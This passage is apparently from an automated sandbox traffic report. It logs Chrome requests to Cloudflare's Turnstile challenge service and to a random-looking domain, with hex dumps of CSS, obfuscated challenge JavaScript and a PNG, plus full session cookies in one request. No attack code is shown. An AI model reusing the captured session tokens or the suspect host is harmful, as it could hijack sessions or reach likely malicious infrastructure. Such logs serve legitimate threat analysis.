                                                                                                                                                2024-10-28 16:49:18 UTC1369INData Raw: 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 7b 68 65 69
                                                                                                                                                Data Ascii: low:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-compact #logo{hei
                                                                                                                                                2024-10-28 16:49:18 UTC1369INData Raw: 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 6a 75 73 74 69 66
                                                                                                                                                Data Ascii: rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex-start;justif
                                                                                                                                                2024-10-28 16:49:18 UTC1369INData Raw: 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 33 70 78 3b 73 74 72 6f 6b 65 2d 6c 69
                                                                                                                                                Data Ascii: ext-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:3px;stroke-li


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                62192.168.2.1649798104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:18 UTC730OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d9c6b17ae923aaf&lang=auto HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/52iod/0x4AAAAAAAwpjSkOf53RqXnc/auto/fbE/normal/auto/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:18 UTC331INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:49:18 GMT
                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                Content-Length: 124815
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c6b1c8f904857-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:49:18 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 76 45 73 72 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c
                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.vEsr2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcl
                                                                                                                                                2024-10-28 16:49:18 UTC1369INData Raw: 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43
                                                                                                                                                Data Ascii: %2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C
                                                                                                                                                2024-10-28 16:49:18 UTC1369INData Raw: 37 32 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 32 38 38 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 35 37 32 29 29 2f 38 2a 28 70 61 72 73 65 49 6e 74 28 67 4b 28 38 39 31 29 29 2f 39 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 35 34 34 29 29 2f 31 30 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 32 32 32 29 29 2f 31 31 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 33 36 32 34 37 33 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 39 31 34 29 5d 2c 65 4d 5b 67 4c 28 31 36 35 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 68 30 2c 65 29 7b 65 3d 28
                                                                                                                                                Data Ascii: 72))/6)+parseInt(gK(1288))/7+-parseInt(gK(1572))/8*(parseInt(gK(891))/9)+-parseInt(gK(1544))/10+-parseInt(gK(1222))/11,d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,362473),eM=this||self,eN=eM[gL(914)],eM[gL(1656)]=function(c,h0,e){e=(
                                                                                                                                                2024-10-28 16:49:18 UTC1369INData Raw: 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 50 68 4d 44 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 6f 4b 78 4a 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4a 62 5a 50 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 79 49 46 76 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 65 42 4f 49 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 68 31 28 31 37 34 30 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 3d 3d 6e 75 6c 6c 3f 27 27 3a 66 2e 67 28 68 2c
                                                                                                                                                Data Ascii: ,i){return i!=h},'PhMDp':function(h,i){return h*i},'oKxJp':function(h,i){return h(i)},'JbZPy':function(h,i){return h!=i},'yIFvi':function(h,i){return h(i)},'eBOIu':function(h,i){return h===i}},e=String[h1(1740)],f={'h':function(h){return h==null?'':f.g(h,
                                                                                                                                                2024-10-28 16:49:18 UTC1369INData Raw: 3d 6a 2d 31 3f 28 4a 3d 30 2c 48 5b 68 33 28 35 36 37 29 5d 28 64 5b 68 33 28 31 39 35 34 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 45 3d 3d 30 26 26 28 45 3d 4d 61 74 68 5b 68 33 28 31 34 30 32 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 20 66 6f 72 28 4e 3d 42 5b 44 5d 2c 78 3d 30 3b 78 3c 47 3b 49 3d 49 3c 3c 31 7c 64 5b 68 33 28 31 35 36 39 29 5d 28 4e 2c 31 29 2c 64 5b 68 33 28 39 38 31 29 5d 28 4a 2c 64 5b 68 33 28 38 38 32 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 68 33 28 35 36 37 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 44 3d 28 45 2d 2d 2c 30 3d 3d 45 26 26 28 45 3d 4d 61 74 68 5b 68 33 28 31
                                                                                                                                                Data Ascii: =j-1?(J=0,H[h3(567)](d[h3(1954)](o,I)),I=0):J++,N>>=1,x++);}E--,E==0&&(E=Math[h3(1402)](2,G),G++),delete C[D]}else for(N=B[D],x=0;x<G;I=I<<1|d[h3(1569)](N,1),d[h3(981)](J,d[h3(882)](j,1))?(J=0,H[h3(567)](o(I)),I=0):J++,N>>=1,x++);D=(E--,0==E&&(E=Math[h3(1
                                                                                                                                                2024-10-28 16:49:18 UTC1369INData Raw: 2d 2d 2c 45 3d 3d 30 26 26 47 2b 2b 7d 65 6c 73 65 20 54 3d 7b 7d 2c 54 5b 68 33 28 31 34 36 35 29 5d 3d 73 5b 68 33 28 34 37 33 29 5d 2c 54 5b 68 33 28 31 34 31 31 29 5d 3d 48 5b 68 33 28 39 34 38 29 5d 5b 68 33 28 36 33 36 29 5d 2c 54 5b 68 33 28 31 36 38 35 29 5d 3d 68 33 28 34 32 33 29 2c 47 5b 68 33 28 31 31 36 34 29 5d 5b 68 33 28 36 33 33 29 5d 28 54 2c 27 2a 27 29 7d 66 6f 72 28 4e 3d 32 2c 78 3d 30 3b 64 5b 68 33 28 31 32 33 38 29 5d 28 78 2c 47 29 3b 49 3d 64 5b 68 33 28 36 38 33 29 5d 28 64 5b 68 33 28 31 33 39 30 29 5d 28 49 2c 31 29 2c 4e 26 31 29 2c 4a 3d 3d 64 5b 68 33 28 31 30 38 39 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 68 33 28 35 36 37 29 5d 28 64 5b 68 33 28 31 39 35 34 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e
                                                                                                                                                Data Ascii: --,E==0&&G++}else T={},T[h3(1465)]=s[h3(473)],T[h3(1411)]=H[h3(948)][h3(636)],T[h3(1685)]=h3(423),G[h3(1164)][h3(633)](T,'*')}for(N=2,x=0;d[h3(1238)](x,G);I=d[h3(683)](d[h3(1390)](I,1),N&1),J==d[h3(1089)](j,1)?(J=0,H[h3(567)](d[h3(1954)](o,I)),I=0):J++,N>
                                                                                                                                                2024-10-28 16:49:18 UTC1369INData Raw: 28 31 34 30 32 29 5d 28 32 2c 38 29 2c 47 3d 31 3b 47 21 3d 4c 3b 4d 3d 48 26 49 2c 49 3e 3e 3d 31 2c 49 3d 3d 30 26 26 28 49 3d 6a 2c 48 3d 64 5b 68 39 28 31 31 33 34 29 5d 28 6f 2c 4a 2b 2b 29 29 2c 4b 7c 3d 28 30 3c 4d 3f 31 3a 30 29 2a 47 2c 47 3c 3c 3d 31 29 3b 78 5b 43 2b 2b 5d 3d 65 28 4b 29 2c 4e 3d 64 5b 68 39 28 38 38 32 29 5d 28 43 2c 31 29 2c 42 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 68 39 28 31 34 30 32 29 5d 28 32 2c 31 36 29 2c 47 3d 31 3b 64 5b 68 39 28 36 33 30 29 5d 28 47 2c 4c 29 3b 4d 3d 48 26 49 2c 49 3e 3e 3d 31 2c 30 3d 3d 49 26 26 28 49 3d 6a 2c 48 3d 6f 28 4a 2b 2b 29 29 2c 4b 7c 3d 64 5b 68 39 28 31 38 34 33 29 5d 28 30 3c 4d 3f 31 3a 30 2c 47 29 2c 47 3c 3c 3d 31 29 3b 78 5b
                                                                                                                                                Data Ascii: (1402)](2,8),G=1;G!=L;M=H&I,I>>=1,I==0&&(I=j,H=d[h9(1134)](o,J++)),K|=(0<M?1:0)*G,G<<=1);x[C++]=e(K),N=d[h9(882)](C,1),B--;break;case 1:for(K=0,L=Math[h9(1402)](2,16),G=1;d[h9(630)](G,L);M=H&I,I>>=1,0==I&&(I=j,H=o(J++)),K|=d[h9(1843)](0<M?1:0,G),G<<=1);x[
                                                                                                                                                2024-10-28 16:49:18 UTC1369INData Raw: 33 37 38 29 2c 65 3d 64 2c 66 3d 31 2c 67 3d 31 65 33 2a 65 4d 5b 68 45 28 31 37 30 34 29 5d 5b 68 45 28 31 32 35 36 29 5d 28 32 2e 38 3c 3c 66 2c 33 32 29 2c 65 4d 5b 68 45 28 31 32 36 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 46 29 7b 68 46 3d 68 45 2c 65 5b 68 46 28 39 39 35 29 5d 3d 3d 3d 65 5b 68 46 28 31 38 38 30 29 5d 3f 28 65 28 29 2c 66 3d 30 29 3a 65 4d 5b 68 46 28 31 31 36 34 29 5d 26 26 28 65 4d 5b 68 46 28 31 38 32 33 29 5d 5b 68 46 28 31 33 31 34 29 5d 28 29 2c 65 4d 5b 68 46 28 31 38 32 33 29 5d 5b 68 46 28 37 33 36 29 5d 28 29 2c 65 4d 5b 68 46 28 31 37 30 30 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 65 5b 68 46 28 31 35 38 37 29 5d 5d 5b 68 46 28 36 33 33 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 68 46 28 31 31 34 33 29 2c 27 77 69 64 67 65 74 49 64
                                                                                                                                                Data Ascii: 378),e=d,f=1,g=1e3*eM[hE(1704)][hE(1256)](2.8<<f,32),eM[hE(1262)](function(hF){hF=hE,e[hF(995)]===e[hF(1880)]?(e(),f=0):eM[hF(1164)]&&(eM[hF(1823)][hF(1314)](),eM[hF(1823)][hF(736)](),eM[hF(1700)]=!![],eM[e[hF(1587)]][hF(633)]({'source':hF(1143),'widgetId
                                                                                                                                                2024-10-28 16:49:18 UTC1369INData Raw: 67 2c 44 5b 68 47 28 39 32 33 29 5d 3d 6c 2c 44 2e 63 63 3d 68 2c 44 5b 68 47 28 31 34 36 35 29 5d 3d 6d 2c 44 5b 68 47 28 31 37 37 38 29 5d 3d 78 2c 45 3d 4a 53 4f 4e 5b 68 47 28 35 32 30 29 5d 28 44 29 2c 46 3d 65 52 5b 68 47 28 31 39 30 38 29 5d 28 45 29 5b 68 47 28 31 36 31 36 29 5d 28 27 2b 27 2c 68 47 28 31 30 31 33 29 29 2c 42 5b 68 47 28 31 34 38 36 29 5d 28 6b 5b 68 47 28 37 32 35 29 5d 28 6b 5b 68 47 28 38 35 32 29 5d 28 27 76 5f 27 2c 65 4d 5b 68 47 28 39 34 38 29 5d 5b 68 47 28 39 36 36 29 5d 29 2c 27 3d 27 29 2b 46 29 7d 63 61 74 63 68 28 47 29 7b 7d 7d 2c 65 4d 5b 67 4c 28 31 35 31 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 68 48 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 69 66 28 68 48 3d 67 4c 2c 65 3d 7b 27 44 59 48 57
                                                                                                                                                Data Ascii: g,D[hG(923)]=l,D.cc=h,D[hG(1465)]=m,D[hG(1778)]=x,E=JSON[hG(520)](D),F=eR[hG(1908)](E)[hG(1616)]('+',hG(1013)),B[hG(1486)](k[hG(725)](k[hG(852)]('v_',eM[hG(948)][hG(966)]),'=')+F)}catch(G){}},eM[gL(1510)]=function(d,hH,e,f,g,h,i,j,k,l,m){if(hH=gL,e={'DYHW
                                                                                                                                                2024-10-28 16:49:18 UTC1369INData Raw: 68 4d 28 31 31 36 34 29 5d 29 26 26 28 76 3d 7b 7d 2c 76 5b 68 4d 28 31 34 36 35 29 5d 3d 68 4d 28 31 31 34 33 29 2c 76 5b 68 4d 28 31 34 31 31 29 5d 3d 73 5b 68 4d 28 39 34 38 29 5d 5b 68 4d 28 36 33 36 29 5d 2c 76 5b 68 4d 28 31 36 38 35 29 5d 3d 68 4d 28 31 36 39 35 29 2c 6f 5b 68 4d 28 31 31 36 34 29 5d 5b 68 4d 28 36 33 33 29 5d 28 76 2c 27 2a 27 29 29 7d 65 6c 73 65 20 65 4d 5b 68 4d 28 31 37 39 38 29 5d 28 6f 2c 75 6e 64 65 66 69 6e 65 64 2c 6b 5b 68 4d 28 31 30 33 34 29 5d 29 7d 2c 31 30 29 2c 65 4d 5b 68 4b 28 31 32 36 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 4e 29 7b 68 4e 3d 68 4b 2c 65 4d 5b 68 4e 28 31 37 39 31 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 68 4b 28 39 33 38 29 5d 5b 68 4b 28 31 30 31 38 29 5d 28 6b 5b 68 4b 28 36 31 31 29 5d 2c
                                                                                                                                                Data Ascii: hM(1164)])&&(v={},v[hM(1465)]=hM(1143),v[hM(1411)]=s[hM(948)][hM(636)],v[hM(1685)]=hM(1695),o[hM(1164)][hM(633)](v,'*'))}else eM[hM(1798)](o,undefined,k[hM(1034)])},10),eM[hK(1262)](function(hN){hN=hK,eM[hN(1791)]()},1e3),eM[hK(938)][hK(1018)](k[hK(611)],


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                63192.168.2.1649799104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:18 UTC742OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/52iod/0x4AAAAAAAwpjSkOf53RqXnc/auto/fbE/normal/auto/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:19 UTC240INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:49:18 GMT
                                                                                                                                                Content-Type: image/png
                                                                                                                                                Content-Length: 61
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: max-age=2629800, public
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c6b1d5951e52c-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:49:19 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                64192.168.2.1649791188.114.96.34436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:19 UTC1338OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                Host: 8sq.w2agn.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                Referer: https://8sq.w2agn.com/B9Z64HC_oJbkvSmVBaQzfkiG7YNd-0Po/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                Cookie: XSRF-TOKEN=eyJpdiI6IjErY2h3UXluTHFhaktPYUY1bThDQWc9PSIsInZhbHVlIjoiY1d2NnpmTGhPR0VJNDg4R2V6THhsU3VaMXhIWUwrcmVBbklQUmxjQnFnVmRGZEJFVlhDMktCbklkUS8rVUt4MlNSbXJUYjZkei83NXdsNm9ocURQOGx4cjcvT1VBOXQ4RThodUoyNkg0SXUyRlVlTURNa3JsSklEajM4VkdyeTQiLCJtYWMiOiIzOTUyYTEwNjc2NzljZGI1MzA3NzcyMmM0YjY4ZmU5MTU5MDdmYWM5NTUzYzNhM2NmMTM0ZTZjZWZjZmVmZTAzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklrNmhTUFNlaGV3Y01IeWF3cE81a0E9PSIsInZhbHVlIjoiZDNtZzZkS01oVGFadCtGckNHRTMwQm9YamZvWGhGbng3RmVBQUdmRkxmN29iQm9jSW9Ea05Ta0prNkNVNFFDZEg0MTMvTDM1WktLSytyWi9WaVR6R3MzWDVTKytzbnVUUHkyTHd6L2JxUUtRVG9vYWF6czJvRm5qS3BBMWVaUysiLCJtYWMiOiI5YTZjZjA0NDliODE1MjU5YmUxZTc0NmYyN2MzMzFmNzVkYTIzOTE2ZWIzNDE1NWIzYzJmNmU5YjNkNDE2ZWM2IiwidGFnIjoiIn0%3D
                                                                                                                                                2024-10-28 16:49:20 UTC1007INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 28 Oct 2024 16:49:20 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F3BkEC3rDOUbHCOb8vJ9zUvIUIwXDLj7jyqvE8ewcIC0SRoZsPtWoVw3k3HThgIVzQXIG1uEY5cLwCetL1FOFv9dA2lG28aBhdTjI%2BHV0cf8ZhAo9KF9JkuAJ19nbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=960&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2253&delivery_rate=3283446&cwnd=250&unsent_bytes=0&cid=2b718447d92560d2&ts=648&x=0"
                                                                                                                                                CF-Cache-Status: EXPIRED
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c6b207c5ebf72-ATL
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=18064&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=1916&delivery_rate=159339&cwnd=32&unsent_bytes=0&cid=70d12aaa1e932325&ts=6406&x=0"
                                                                                                                                                2024-10-28 16:49:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                65192.168.2.1649800104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
